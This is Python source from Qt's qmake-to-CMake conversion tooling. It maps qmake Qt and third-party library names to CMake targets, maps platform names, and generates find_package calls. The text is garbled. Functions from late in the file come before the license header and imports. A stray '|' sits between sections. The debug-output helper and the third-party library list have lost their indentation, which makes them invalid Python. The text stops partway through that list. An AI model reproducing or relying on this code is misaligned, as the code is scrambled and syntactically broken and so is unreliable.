    """Map a nolink helper library back to its '<soName>/nolink' spelling."""
    for mapping in _library_map:
        if mapping.no_link_so_name == lib:
            return f"{mapping.soName}/nolink"
    return lib
def featureName(name: str) -> str:
    """Sanitize a feature name into an identifier-safe form.

    Every character outside [a-zA-Z0-9_] is substituted.  For C++ feature
    names (anything starting with "c++") the substitute is "x", so the
    result reads like "cxx11" instead of "c__11"; otherwise "_" is used.
    """
    substitute = "x" if name.startswith("c++") else "_"
    return re.sub(r"[^a-zA-Z0-9_]", substitute, name)
def map_qt_library(lib: str) -> str:
    """Translate a qmake Qt library name into its CMake target name.

    A "-private" suffix is stripped before the lookup and re-applied as
    "Private" on the resulting target name.  Unknown libraries are
    returned unchanged (modulo the private suffix handling).
    """
    private = lib.endswith("-private")
    if private:
        lib = lib[: -len("-private")]
    mapped = find_qt_library_mapping(lib)
    if mapped:
        assert mapped.targetName  # Qt libs must have a target name set
        qt_name = mapped.targetName
    else:
        qt_name = lib
    return (qt_name + "Private") if private else qt_name
# Maps qmake platform / compiler scope names to the corresponding CMake
# condition names.  Consulted by map_platform(); names not present here
# pass through unchanged.
platform_mapping: typing.Dict[str, str] = {
    "win32": "WIN32",
    "win": "WIN32",
    "unix": "UNIX",
    "darwin": "APPLE",
    "linux": "LINUX",
    "integrity": "INTEGRITY",
    "qnx": "QNX",
    "vxworks": "VXWORKS",
    "hpux": "HPUX",
    "nacl": "NACL",
    "android": "ANDROID",
    "android-embedded": "ANDROID_EMBEDDED",
    "uikit": "UIKIT",
    "tvos": "TVOS",
    "watchos": "WATCHOS",
    "winrt": "WINRT",
    "wasm": "WASM",
    "emscripten": "EMSCRIPTEN",
    "msvc": "MSVC",
    "clang": "CLANG",
    "gcc": "GCC",
    "icc": "ICC",
    "intel_icc": "ICC",
    "osx": "MACOS",
    "ios": "IOS",
    "freebsd": "FREEBSD",
    "openbsd": "OPENBSD",
    "mingw": "MINGW",
    "netbsd": "NETBSD",
    "haiku": "HAIKU",
    "mac": "APPLE",
    "macx": "MACOS",
    "macos": "MACOS",
    "macx-icc": "(MACOS AND ICC)",
}
def map_platform(platform: str) -> str:
    """Return the qmake platform as cmake platform or the unchanged string."""
    try:
        return platform_mapping[platform]
    except KeyError:
        return platform
def is_known_3rd_party_library(lib: str) -> bool:
    """Return True when *lib* (optionally carrying a nolink suffix) has a
    3rd-party mapping.

    Both "/nolink" and "_nolink" suffix spellings are accepted; when the
    stripped library has a dedicated nolink mapping registered, that
    mapping is what determines the result.
    """
    handling_no_link = False
    # str.endswith takes a tuple of suffixes; both spellings are 7 chars,
    # so strip by length instead of a magic -7.
    if lib.endswith(("/nolink", "_nolink")):
        lib = lib[: -len("/nolink")]
        handling_no_link = True
    mapping = find_3rd_party_library_mapping(lib)
    if handling_no_link and mapping and mapping.no_link_so_name:
        # Prefer the dedicated nolink mapping when one is registered.
        no_link_mapping = find_3rd_party_library_mapping(mapping.no_link_so_name)
        if no_link_mapping:
            mapping = no_link_mapping
    return mapping is not None
def map_3rd_party_library(lib: str) -> str:
    """Translate a qmake 3rd-party library name into its CMake target name.

    A "/nolink" suffix becomes a "_nolink" postfix on the mapped target,
    unless the library has a dedicated nolink mapping, in which case that
    mapping's target is used without a postfix.  Unknown libraries (or
    mappings without a target) are returned unchanged.
    """
    handling_no_link = lib.endswith("/nolink")
    libpostfix = ""
    if handling_no_link:
        lib = lib[:-7]
        libpostfix = "_nolink"
    mapping = find_3rd_party_library_mapping(lib)
    if handling_no_link and mapping and mapping.no_link_so_name:
        no_link_mapping = find_3rd_party_library_mapping(mapping.no_link_so_name)
        if no_link_mapping:
            mapping = no_link_mapping
            libpostfix = ""
    if mapping and mapping.targetName:
        return mapping.targetName + libpostfix
    return lib
# Per-compile-test dependency overrides: when running the named compile
# test, substitute the key library with its value (e.g. link only against
# the OpenSSL headers instead of the full OpenSSL library).
compile_test_dependent_library_mapping: typing.Dict[str, typing.Dict[str, str]] = {
    "dtls": {"openssl": "openssl_headers"},
    "ocsp": {"openssl": "openssl_headers"},
}
def get_compile_test_dependent_library_mapping(compile_test_name: str, dependency_name: str) -> str:
    """Return the dependency to use for the given compile test.

    Looks up ``compile_test_dependent_library_mapping``; when no override
    is registered for this test/dependency pair, the dependency name is
    returned unchanged.  (Return annotation added for consistency with the
    sibling helpers; two .get() calls replace the nested membership tests.)
    """
    overrides = compile_test_dependent_library_mapping.get(compile_test_name, {})
    return overrides.get(dependency_name, dependency_name)
def generate_find_package_info(
    lib: LibraryMapping,
    use_qt_find_package: bool = True,
    *,
    indent: int = 0,
    emit_if: str = "",
    use_system_package_name: bool = False,
    module: str = "",
) -> str:
    """Generate the CMake find_package()/qt_find_package() call for *lib*.

    Args:
        lib: mapping carrying package name, target name and extra args.
        use_qt_find_package: emit qt_find_package() (with PROVIDED_TARGETS
            and QMAKE_LIB bookkeeping) instead of plain find_package().
        indent: indentation level, in units of one_ind, for the call.
        emit_if: optional CMake condition; when non-empty the generated
            call is wrapped in an if(... OR QT_FIND_ALL_PACKAGES_ALWAYS).
        use_system_package_name: rewrite "Wrap..." package/target names to
            their "WrapSystem..." variants.
        module: module name forwarded as MODULE_NAME.

    Returns the generated CMake snippet (with trailing newline).
    """
    isRequired = False
    extra = lib.extra.copy()
    if "REQUIRED" in extra and use_qt_find_package:
        # qt_find_package() expresses requiredness via
        # set_package_properties() instead (appended below).
        isRequired = True
        extra.remove("REQUIRED")
    cmake_target_name = lib.targetName
    assert cmake_target_name
    # _nolink or not does not matter at this point:
    if cmake_target_name.endswith("_nolink") or cmake_target_name.endswith("/nolink"):
        cmake_target_name = cmake_target_name[:-7]
    initial_package_name: str = lib.packageName if lib.packageName else ""
    package_name: str = initial_package_name
    if use_system_package_name:
        replace_args = ["Wrap", "WrapSystem"]
        package_name = package_name.replace(*replace_args)  # type: ignore
        cmake_target_name = cmake_target_name.replace(*replace_args)  # type: ignore
    if use_qt_find_package:
        if cmake_target_name:
            extra += ["PROVIDED_TARGETS", cmake_target_name]
        if module:
            extra += ["MODULE_NAME", module]
            extra += ["QMAKE_LIB", find_annotated_qmake_lib_name(lib.soName)]
    result = ""
    one_ind = " "
    ind = one_ind * indent
    if use_qt_find_package:
        # BUG FIX: these f-strings previously nested double quotes inside a
        # double-quoted f-string ({" ".join(extra)}), which is a SyntaxError
        # on Python < 3.12; single quotes are valid everywhere.
        if extra:
            result = f"{ind}qt_find_package({package_name} {' '.join(extra)})\n"
        else:
            result = f"{ind}qt_find_package({package_name})\n"
        if isRequired:
            result += (
                f"{ind}set_package_properties({initial_package_name} PROPERTIES TYPE REQUIRED)\n"
            )
    else:
        if extra:
            result = f"{ind}find_package({package_name} {' '.join(extra)})\n"
        else:
            result = f"{ind}find_package({package_name})\n"
    # If a package should be found only in certain conditions, wrap
    # the find_package call within that condition.
    if emit_if:
        result = f"if(({emit_if}) OR QT_FIND_ALL_PACKAGES_ALWAYS)\n{one_ind}{result}endif()\n"
    return result
def _set_up_py_parsing_nicer_debug_output(pp):
indent = -1
def increase_indent(fn):
def wrapper_function(*args):
nonlocal indent
indent += 1
print("> " * indent, end="")
return fn(*args)
return wrapper_function
def decrease_indent(fn):
def wrapper_function(*args):
nonlocal indent
print("> " * indent, end="")
indent -= 1
return fn(*args)
return wrapper_function
pp._defaultStartDebugAction = increase_indent(pp._defaultStartDebugAction)
pp._defaultSuccessDebugAction = decrease_indent(pp._defaultSuccessDebugAction)
pp._defaultExceptionDebugAction = decrease_indent(pp._defaultExceptionDebugAction)
| #############################################################################
##
## Copyright (C) 2018 The Qt Company Ltd.
## Contact: https://www.qt.io/licensing/
##
## This file is part of the plugins of the Qt Toolkit.
##
## $QT_BEGIN_LICENSE:GPL-EXCEPT$
## Commercial License Usage
## Licensees holding valid commercial Qt licenses may use this file in
## accordance with the commercial license agreement provided with the
## Software or, alternatively, in accordance with the terms contained in
## a written agreement between you and The Qt Company. For licensing terms
## and conditions see https://www.qt.io/terms-conditions. For further
## information use the contact form at https://www.qt.io/contact-us.
##
## GNU General Public License Usage
## Alternatively, this file may be used under the terms of the GNU
## General Public License version 3 as published by the Free Software
## Foundation with exceptions as appearing in the file LICENSE.GPL3-EXCEPT
## included in the packaging of this file. Please review the following
## information to ensure the GNU General Public License requirements will
## be met: https://www.gnu.org/licenses/gpl-3.0.html.
##
## $QT_END_LICENSE$
##
#############################################################################
import re
import typing
class LibraryMapping:
    """Describes how a qmake library maps onto a CMake package and target."""

    def __init__(
        self,
        soName: str,
        packageName: typing.Optional[str],
        targetName: typing.Optional[str],
        *,
        resultVariable: typing.Optional[str] = None,
        extra: typing.Optional[typing.List[str]] = None,
        appendFoundSuffix: bool = True,
        emit_if: str = "",
        is_bundled_with_qt: bool = False,
        test_library_overwrite: str = "",
        run_library_test: bool = False,
        no_link_so_name: str = "",
    ) -> None:
        self.soName = soName
        self.packageName = packageName
        self.resultVariable = resultVariable
        self.appendFoundSuffix = appendFoundSuffix
        # Allows passing additional arguments to the generated find_package call.
        # BUG FIX: the default was a mutable list literal ([]), which is
        # shared between every instance constructed without "extra"; use a
        # None sentinel and allocate a fresh list per instance instead.
        self.extra = extra if extra is not None else []
        self.targetName = targetName
        # True if qt bundles the library sources as part of Qt.
        self.is_bundled_with_qt = is_bundled_with_qt
        # if emit_if is non-empty, the generated find_package call
        # for a library will be surrounded by this condition.
        self.emit_if = emit_if
        # Allow overwriting library name when used with tests. E.g.: _nolink
        # targets do not exist when used during compile tests
        self.test_library_overwrite = test_library_overwrite
        # Run the library compile test of configure.json
        self.run_library_test = run_library_test
        # The custom nolink library mapping associated with this one.
        self.no_link_so_name = no_link_so_name

    def is_qt(self) -> bool:
        """True when this mapping refers to a Qt module package."""
        return self.packageName == "Qt" or self.packageName == "Qt5" or self.packageName == "Qt6"
# Maps qmake Qt module library names (the values used with "QT += <name>")
# onto the Qt6 CMake package and its imported Qt:: target, including the
# COMPONENTS arguments for find_package().  Consulted via
# find_qt_library_mapping(), which returns the first matching entry.
_qt_library_map: typing.List[LibraryMapping] = [
    # Qt:
    LibraryMapping(
        "androidextras", "Qt6", "Qt::AndroidExtras", extra=["COMPONENTS", "AndroidExtras"]
    ),
    LibraryMapping("3danimation", "Qt6", "Qt::3DAnimation", extra=["COMPONENTS", "3DAnimation"]),
    LibraryMapping("3dcore", "Qt6", "Qt::3DCore", extra=["COMPONENTS", "3DCore"]),
    LibraryMapping("3dcoretest", "Qt6", "Qt::3DCoreTest", extra=["COMPONENTS", "3DCoreTest"]),
    LibraryMapping("3dextras", "Qt6", "Qt::3DExtras", extra=["COMPONENTS", "3DExtras"]),
    LibraryMapping("3dinput", "Qt6", "Qt::3DInput", extra=["COMPONENTS", "3DInput"]),
    LibraryMapping("3dlogic", "Qt6", "Qt::3DLogic", extra=["COMPONENTS", "3DLogic"]),
    LibraryMapping("3dquick", "Qt6", "Qt::3DQuick", extra=["COMPONENTS", "3DQuick"]),
    LibraryMapping(
        "3dquickextras", "Qt6", "Qt::3DQuickExtras", extra=["COMPONENTS", "3DQuickExtras"]
    ),
    LibraryMapping("3dquickinput", "Qt6", "Qt::3DQuickInput", extra=["COMPONENTS", "3DQuickInput"]),
    LibraryMapping(
        "3dquickrender", "Qt6", "Qt::3DQuickRender", extra=["COMPONENTS", "3DQuickRender"]
    ),
    LibraryMapping("3drender", "Qt6", "Qt::3DRender", extra=["COMPONENTS", "3DRender"]),
    LibraryMapping(
        "application-lib", "Qt6", "Qt::AppManApplication", extra=["COMPONENTS", "AppManApplication"]
    ),
    LibraryMapping("axbase", "Qt6", "Qt::AxBase", extra=["COMPONENTS", "AxBase"]),
    LibraryMapping("axcontainer", "Qt6", "Qt::AxContainer", extra=["COMPONENTS", "AxContainer"]),
    LibraryMapping("axserver", "Qt6", "Qt::AxServer", extra=["COMPONENTS", "AxServer"]),
    LibraryMapping("bluetooth", "Qt6", "Qt::Bluetooth", extra=["COMPONENTS", "Bluetooth"]),
    LibraryMapping("bootstrap", "Qt6", "Qt::Bootstrap", extra=["COMPONENTS", "Bootstrap"]),
    # bootstrap-dbus: Not needed in Qt6!
    LibraryMapping("client", "Qt6", "Qt::WaylandClient", extra=["COMPONENTS", "WaylandClient"]),
    LibraryMapping("coap", "Qt6", "Qt::Coap", extra=["COMPONENTS", "Coap"]),
    LibraryMapping("common-lib", "Qt6", "Qt::AppManCommon", extra=["COMPONENTS", "AppManCommon"]),
    LibraryMapping(
        "compositor", "Qt6", "Qt::WaylandCompositor", extra=["COMPONENTS", "WaylandCompositor"]
    ),
    LibraryMapping("concurrent", "Qt6", "Qt::Concurrent", extra=["COMPONENTS", "Concurrent"]),
    LibraryMapping("container", "Qt6", "Qt::AxContainer", extra=["COMPONENTS", "AxContainer"]),
    LibraryMapping("control", "Qt6", "Qt::AxServer", extra=["COMPONENTS", "AxServer"]),
    LibraryMapping(
        "core_headers", "Qt6", "Qt::WebEngineCore", extra=["COMPONENTS", "WebEngineCore"]
    ),
    LibraryMapping("core", "Qt6", "Qt::Core", extra=["COMPONENTS", "Core"]),
    LibraryMapping("crypto-lib", "Qt6", "Qt::AppManCrypto", extra=["COMPONENTS", "AppManCrypto"]),
    LibraryMapping("dbus", "Qt6", "Qt::DBus", extra=["COMPONENTS", "DBus"]),
    LibraryMapping("designer", "Qt6", "Qt::Designer", extra=["COMPONENTS", "Designer"]),
    LibraryMapping(
        "designercomponents",
        "Qt6",
        "Qt::DesignerComponents",
        extra=["COMPONENTS", "DesignerComponents"],
    ),
    LibraryMapping(
        "devicediscovery",
        "Qt6",
        "Qt::DeviceDiscoverySupport",
        extra=["COMPONENTS", "DeviceDiscoverySupport"],
    ),
    LibraryMapping(
        "devicediscovery_support",
        "Qt6",
        "Qt::DeviceDiscoverySupport",
        extra=["COMPONENTS", "DeviceDiscoverySupport"],
    ),
    LibraryMapping("edid", "Qt6", "Qt::EdidSupport", extra=["COMPONENTS", "EdidSupport"]),
    LibraryMapping("edid_support", "Qt6", "Qt::EdidSupport", extra=["COMPONENTS", "EdidSupport"]),
    LibraryMapping("eglconvenience", "Qt6", "Qt::EglSupport", extra=["COMPONENTS", "EglSupport"]),
    LibraryMapping(
        "eglfsdeviceintegration",
        "Qt6",
        "Qt::EglFSDeviceIntegration",
        extra=["COMPONENTS", "EglFSDeviceIntegration"],
    ),
    LibraryMapping(
        "eglfs_kms_support", "Qt6", "Qt::EglFsKmsSupport", extra=["COMPONENTS", "EglFsKmsSupport"]
    ),
    LibraryMapping(
        "eglfs_kms_gbm_support",
        "Qt6",
        "Qt::EglFsKmsGbmSupport",
        extra=["COMPONENTS", "EglFsKmsGbmSupport"],
    ),
    LibraryMapping("egl_support", "Qt6", "Qt::EglSupport", extra=["COMPONENTS", "EglSupport"]),
    # enginio: Not needed in Qt6!
    LibraryMapping(
        "eventdispatchers",
        "Qt6",
        "Qt::EventDispatcherSupport",
        extra=["COMPONENTS", "EventDispatcherSupport"],
    ),
    LibraryMapping(
        "eventdispatcher_support",
        "Qt6",
        "Qt::EventDispatcherSupport",
        extra=["COMPONENTS", "EventDispatcherSupport"],
    ),
    LibraryMapping("fbconvenience", "Qt6", "Qt::FbSupport", extra=["COMPONENTS", "FbSupport"]),
    LibraryMapping("fb_support", "Qt6", "Qt::FbSupport", extra=["COMPONENTS", "FbSupport"]),
    LibraryMapping(
        "fontdatabase_support",
        "Qt6",
        "Qt::FontDatabaseSupport",
        extra=["COMPONENTS", "FontDatabaseSupport"],
    ),
    LibraryMapping("gamepad", "Qt6", "Qt::Gamepad", extra=["COMPONENTS", "Gamepad"]),
    LibraryMapping(
        "global", "Qt6", "Qt::Core", extra=["COMPONENTS", "Core"]
    ),  # manually added special case
    LibraryMapping("glx_support", "Qt6", "Qt::GlxSupport", extra=["COMPONENTS", "GlxSupport"]),
    LibraryMapping(
        "gsttools", "Qt6", "Qt::MultimediaGstTools", extra=["COMPONENTS", "MultimediaGstTools"]
    ),
    LibraryMapping("gui", "Qt6", "Qt::Gui", extra=["COMPONENTS", "Gui"]),
    LibraryMapping("help", "Qt6", "Qt::Help", extra=["COMPONENTS", "Help"]),
    LibraryMapping(
        "hunspellinputmethod",
        "Qt6",
        "Qt::HunspellInputMethod",
        extra=["COMPONENTS", "HunspellInputMethod"],
    ),
    LibraryMapping("input", "Qt6", "Qt::InputSupport", extra=["COMPONENTS", "InputSupport"]),
    LibraryMapping(
        "input_support", "Qt6", "Qt::InputSupport", extra=["COMPONENTS", "InputSupport"]
    ),
    LibraryMapping(
        "installer-lib", "Qt6", "Qt::AppManInstaller", extra=["COMPONENTS", "AppManInstaller"]
    ),
    LibraryMapping("knx", "Qt6", "Qt::Knx", extra=["COMPONENTS", "Knx"]),
    LibraryMapping("kmsconvenience", "Qt6", "Qt::KmsSupport", extra=["COMPONENTS", "KmsSupport"]),
    LibraryMapping("kms_support", "Qt6", "Qt::KmsSupport", extra=["COMPONENTS", "KmsSupport"]),
    LibraryMapping(
        "launcher-lib", "Qt6", "Qt::AppManLauncher", extra=["COMPONENTS", "AppManLauncher"]
    ),
    LibraryMapping("lib", "Qt6", "Qt::Designer", extra=["COMPONENTS", "Designer"]),
    LibraryMapping(
        "linuxaccessibility_support",
        "Qt6",
        "Qt::LinuxAccessibilitySupport",
        extra=["COMPONENTS", "LinuxAccessibilitySupport"],
    ),
    LibraryMapping("location", "Qt6", "Qt::Location", extra=["COMPONENTS", "Location"]),
    LibraryMapping("macextras", "Qt6", "Qt::MacExtras", extra=["COMPONENTS", "MacExtras"]),
    LibraryMapping("main-lib", "Qt6", "Qt::AppManMain", extra=["COMPONENTS", "AppManMain"]),
    LibraryMapping(
        "manager-lib", "Qt6", "Qt::AppManManager", extra=["COMPONENTS", "AppManManager"]
    ),
    LibraryMapping(
        "monitor-lib", "Qt6", "Qt::AppManMonitor", extra=["COMPONENTS", "AppManMonitor"]
    ),
    LibraryMapping("mqtt", "Qt6", "Qt::Mqtt", extra=["COMPONENTS", "Mqtt"]),
    LibraryMapping("multimedia", "Qt6", "Qt::Multimedia", extra=["COMPONENTS", "Multimedia"]),
    LibraryMapping(
        "multimediawidgets",
        "Qt6",
        "Qt::MultimediaWidgets",
        extra=["COMPONENTS", "MultimediaWidgets"],
    ),
    LibraryMapping("network", "Qt6", "Qt::Network", extra=["COMPONENTS", "Network"]),
    LibraryMapping("networkauth", "Qt6", "Qt::NetworkAuth", extra=["COMPONENTS", "NetworkAuth"]),
    LibraryMapping("nfc", "Qt6", "Qt::Nfc", extra=["COMPONENTS", "Nfc"]),
    LibraryMapping("oauth", "Qt6", "Qt::NetworkAuth", extra=["COMPONENTS", "NetworkAuth"]),
    LibraryMapping("opcua", "Qt6", "Qt::OpcUa", extra=["COMPONENTS", "OpcUa"]),
    LibraryMapping(
        "opcua_private", "Qt6", "Qt::OpcUaPrivate", extra=["COMPONENTS", "OpcUaPrivate"]
    ),
    LibraryMapping("opengl", "Qt6", "Qt::OpenGL", extra=["COMPONENTS", "OpenGL"]),
    LibraryMapping(
        "openglwidgets", "Qt6", "Qt::OpenGLWidgets", extra=["COMPONENTS", "OpenGLWidgets"]
    ),
    LibraryMapping(
        "package-lib", "Qt6", "Qt::AppManPackage", extra=["COMPONENTS", "AppManPackage"]
    ),
    LibraryMapping(
        "packetprotocol", "Qt6", "Qt::PacketProtocol", extra=["COMPONENTS", "PacketProtocol"]
    ),
    LibraryMapping(
        "particles", "Qt6", "Qt::QuickParticles", extra=["COMPONENTS", "QuickParticles"]
    ),
    LibraryMapping(
        "plugin-interfaces",
        "Qt6",
        "Qt::AppManPluginInterfaces",
        extra=["COMPONENTS", "AppManPluginInterfaces"],
    ),
    LibraryMapping("positioning", "Qt6", "Qt::Positioning", extra=["COMPONENTS", "Positioning"]),
    LibraryMapping(
        "positioningquick", "Qt6", "Qt::PositioningQuick", extra=["COMPONENTS", "PositioningQuick"]
    ),
    LibraryMapping("printsupport", "Qt6", "Qt::PrintSupport", extra=["COMPONENTS", "PrintSupport"]),
    LibraryMapping("purchasing", "Qt6", "Qt::Purchasing", extra=["COMPONENTS", "Purchasing"]),
    LibraryMapping("qmldebug", "Qt6", "Qt::QmlDebug", extra=["COMPONENTS", "QmlDebug"]),
    LibraryMapping("qmldevtools", "Qt6", "Qt::QmlDevTools", extra=["COMPONENTS", "QmlDevTools"]),
    LibraryMapping("qmlcompiler", "Qt6", "Qt::QmlCompiler", extra=["COMPONENTS", "QmlCompiler"]),
    LibraryMapping("qml", "Qt6", "Qt::Qml", extra=["COMPONENTS", "Qml"]),
    LibraryMapping("qmldom", "Qt6", "Qt::QmlDom", extra=["COMPONENTS", "QmlDom"]),
    LibraryMapping("qmlmodels", "Qt6", "Qt::QmlModels", extra=["COMPONENTS", "QmlModels"]),
    LibraryMapping("qmltest", "Qt6", "Qt::QuickTest", extra=["COMPONENTS", "QuickTest"]),
    LibraryMapping(
        "qtmultimediaquicktools",
        "Qt6",
        "Qt::MultimediaQuick",
        extra=["COMPONENTS", "MultimediaQuick"],
    ),
    LibraryMapping(
        "quick3dassetimport",
        "Qt6",
        "Qt::Quick3DAssetImport",
        extra=["COMPONENTS", "Quick3DAssetImport"],
    ),
    LibraryMapping("core5compat", "Qt6", "Qt::Core5Compat", extra=["COMPONENTS", "Core5Compat"]),
    LibraryMapping("quick3d", "Qt6", "Qt::Quick3D", extra=["COMPONENTS", "Quick3D"]),
    LibraryMapping(
        "quick3drender", "Qt6", "Qt::Quick3DRender", extra=["COMPONENTS", "Quick3DRender"]
    ),
    LibraryMapping(
        "quick3druntimerender",
        "Qt6",
        "Qt::Quick3DRuntimeRender",
        extra=["COMPONENTS", "Quick3DRuntimeRender"],
    ),
    LibraryMapping("quick3dutils", "Qt6", "Qt::Quick3DUtils", extra=["COMPONENTS", "Quick3DUtils"]),
    LibraryMapping(
        "quickcontrols2", "Qt6", "Qt::QuickControls2", extra=["COMPONENTS", "QuickControls2"]
    ),
    LibraryMapping(
        "quickcontrols2impl",
        "Qt6",
        "Qt::QuickControls2Impl",
        extra=["COMPONENTS", "QuickControls2Impl"],
    ),
    LibraryMapping("quick", "Qt6", "Qt::Quick", extra=["COMPONENTS", "Quick"]),
    LibraryMapping("quickshapes", "Qt6", "Qt::QuickShapes", extra=["COMPONENTS", "QuickShapes"]),
    LibraryMapping(
        "quicktemplates2", "Qt6", "Qt::QuickTemplates2", extra=["COMPONENTS", "QuickTemplates2"]
    ),
    LibraryMapping("quickwidgets", "Qt6", "Qt::QuickWidgets", extra=["COMPONENTS", "QuickWidgets"]),
    LibraryMapping(
        "remoteobjects", "Qt6", "Qt::RemoteObjects", extra=["COMPONENTS", "RemoteObjects"]
    ),
    LibraryMapping("script", "Qt6", "Qt::Script", extra=["COMPONENTS", "Script"]),
    LibraryMapping("scripttools", "Qt6", "Qt::ScriptTools", extra=["COMPONENTS", "ScriptTools"]),
    LibraryMapping("scxml", "Qt6", "Qt::Scxml", extra=["COMPONENTS", "Scxml"]),
    LibraryMapping("sensors", "Qt6", "Qt::Sensors", extra=["COMPONENTS", "Sensors"]),
    LibraryMapping("serialport", "Qt6", "Qt::SerialPort", extra=["COMPONENTS", "SerialPort"]),
    LibraryMapping("serialbus", "Qt6", "Qt::SerialBus", extra=["COMPONENTS", "SerialBus"]),
    LibraryMapping("services", "Qt6", "Qt::ServiceSupport", extra=["COMPONENTS", "ServiceSupport"]),
    LibraryMapping(
        "service_support", "Qt6", "Qt::ServiceSupport", extra=["COMPONENTS", "ServiceSupport"]
    ),
    LibraryMapping("shadertools", "Qt6", "Qt::ShaderTools", extra=["COMPONENTS", "ShaderTools"]),
    LibraryMapping("sql", "Qt6", "Qt::Sql", extra=["COMPONENTS", "Sql"]),
    LibraryMapping("svg", "Qt6", "Qt::Svg", extra=["COMPONENTS", "Svg"]),
    LibraryMapping("svgwidgets", "Qt6", "Qt::SvgWidgets", extra=["COMPONENTS", "SvgWidgets"]),
    LibraryMapping("charts", "Qt6", "Qt::Charts", extra=["COMPONENTS", "Charts"]),
    LibraryMapping("testlib", "Qt6", "Qt::Test", extra=["COMPONENTS", "Test"]),
    LibraryMapping("texttospeech", "Qt6", "Qt::TextToSpeech", extra=["COMPONENTS", "TextToSpeech"]),
    LibraryMapping(
        "theme_support", "Qt6", "Qt::ThemeSupport", extra=["COMPONENTS", "ThemeSupport"]
    ),
    LibraryMapping("tts", "Qt6", "Qt::TextToSpeech", extra=["COMPONENTS", "TextToSpeech"]),
    LibraryMapping("uiplugin", "Qt6", "Qt::UiPlugin", extra=["COMPONENTS", "UiPlugin"]),
    LibraryMapping("uitools", "Qt6", "Qt::UiTools", extra=["COMPONENTS", "UiTools"]),
    LibraryMapping(
        "virtualkeyboard", "Qt6", "Qt::VirtualKeyboard", extra=["COMPONENTS", "VirtualKeyboard"]
    ),
    LibraryMapping(
        "waylandclient", "Qt6", "Qt::WaylandClient", extra=["COMPONENTS", "WaylandClient"]
    ),
    LibraryMapping(
        "waylandcompositor",
        "Qt6",
        "Qt::WaylandCompositor",
        extra=["COMPONENTS", "WaylandCompositor"],
    ),
    LibraryMapping("webchannel", "Qt6", "Qt::WebChannel", extra=["COMPONENTS", "WebChannel"]),
    LibraryMapping("webengine", "Qt6", "Qt::WebEngine", extra=["COMPONENTS", "WebEngine"]),
    LibraryMapping(
        "webenginewidgets", "Qt6", "Qt::WebEngineWidgets", extra=["COMPONENTS", "WebEngineWidgets"]
    ),
    LibraryMapping("websockets", "Qt6", "Qt::WebSockets", extra=["COMPONENTS", "WebSockets"]),
    LibraryMapping("webview", "Qt6", "Qt::WebView", extra=["COMPONENTS", "WebView"]),
    LibraryMapping("widgets", "Qt6", "Qt::Widgets", extra=["COMPONENTS", "Widgets"]),
    LibraryMapping("window-lib", "Qt6", "Qt::AppManWindow", extra=["COMPONENTS", "AppManWindow"]),
    LibraryMapping("winextras", "Qt6", "Qt::WinExtras", extra=["COMPONENTS", "WinExtras"]),
    LibraryMapping("x11extras", "Qt6", "Qt::X11Extras", extra=["COMPONENTS", "X11Extras"]),
    LibraryMapping("xcb_qpa_lib", "Qt6", "Qt::XcbQpa", extra=["COMPONENTS", "XcbQpa"]),
    LibraryMapping(
        "xkbcommon_support", "Qt6", "Qt::XkbCommonSupport", extra=["COMPONENTS", "XkbCommonSupport"]
    ),
    LibraryMapping("xmlpatterns", "Qt6", "Qt::XmlPatterns", extra=["COMPONENTS", "XmlPatterns"]),
    LibraryMapping("xml", "Qt6", "Qt::Xml", extra=["COMPONENTS", "Xml"]),
    LibraryMapping(
        "qmlworkerscript", "Qt6", "Qt::QmlWorkerScript", extra=["COMPONENTS", "QmlWorkerScript"]
    ),
    LibraryMapping(
        "quickparticles", "Qt6", "Qt::QuickParticles", extra=["COMPONENTS", "QuickParticles"]
    ),
    LibraryMapping(
        "linuxofono_support",
        "Qt6",
        "Qt::LinuxOfonoSupport",
        extra=["COMPONENTS", "LinuxOfonoSupport"],
    ),
    LibraryMapping(
        "linuxofono_support_private",
        "Qt6",
        "Qt::LinuxOfonoSupportPrivate",
        extra=["COMPONENTS", "LinuxOfonoSupportPrivate"],
    ),
    LibraryMapping("tools", "Qt6", "Qt::Tools", extra=["COMPONENTS", "Tools"]),
    # NOTE(review): duplicate of the "axcontainer" entry above — lookups
    # return the first match, so this entry is dead; confirm before removal.
    LibraryMapping("axcontainer", "Qt6", "Qt::AxContainer", extra=["COMPONENTS", "AxContainer"]),
    LibraryMapping(
        "webkitwidgets", "Qt6", "Qt::WebKitWidgets", extra=["COMPONENTS", "WebKitWidgets"]
    ),
    LibraryMapping("zlib", "Qt6", "Qt::Zlib", extra=["COMPONENTS", "Zlib"]),
    LibraryMapping("httpserver", "Qt6", "Qt::HttpServer", extra=["COMPONENTS", "HttpServer"]),
    LibraryMapping("sslserver", "Qt6", "Qt::SslServer", extra=["COMPONENTS", "HttpServer"]),
]
# Note that the library map is adjusted dynamically further down.
_library_map = [
# 3rd party:
LibraryMapping("atspi", "ATSPI2", "PkgConfig::ATSPI2"),
LibraryMapping("bluez", "BlueZ", "PkgConfig::BlueZ"),
LibraryMapping("brotli", "WrapBrotli", "WrapBrotli::WrapBrotliDec"),
LibraryMapping("corewlan", None, None),
LibraryMapping("cups", "Cups", "Cups::Cups"),
LibraryMapping("directfb", "DirectFB", "PkgConfig::DirectFB"),
LibraryMapping("db2", "DB2", "DB2::DB2"),
LibraryMapping("dbus", "WrapDBus1", "dbus-1", resultVariable="DBus1", extra=["1.2"]),
LibraryMapping(
"doubleconversion", "WrapDoubleConversion", "WrapDoubleConversion::WrapDoubleConversion"
),
LibraryMapping("drm", "Libdrm", "Libdrm::Libdrm"),
LibraryMapping("egl", "EGL", "EGL::EGL"),
LibraryMapping("flite", "Flite", "Flite::Flite"),
LibraryMapping("flite_alsa", "ALSA", "ALSA::ALSA"),
LibraryMapping(
"fontconfig", "Fontconfig", "Fontconfig::Fontconfig", resultVariable="FONTCONFIG"
),
LibraryMapping(
"freetype",
"WrapFreetype",
"WrapFreetype::WrapFreetype",
extra=["2.2.0", "REQUIRED"],
is_bundled_with_qt=True,
),
LibraryMapping("gbm", "gbm", "gbm::gbm"),
LibraryMapping("glib", "GLIB2", "GLIB2::GLIB2"),
LibraryMapping("iconv", "WrapIconv", "WrapIconv::WrapIconv"),
LibraryMapping("gtk3", "GTK3", "PkgConfig::GTK3", extra=["3.6"]),
LibraryMapping("gssapi", "GSSAPI", "GSSAPI::GSSAPI"),
LibraryMapping(
"harfbuzz",
"WrapHarfbuzz",
"WrapHarfbuzz::WrapHarfbuzz",
is_bundled_with_qt=True,
extra=["2.6.0"],
),
LibraryMapping("host_dbus", None, None),
LibraryMapping(
"icu", "ICU", "ICU::i18n ICU::uc ICU::data", extra=["COMPONENTS", "i18n", "uc", "data"]
),
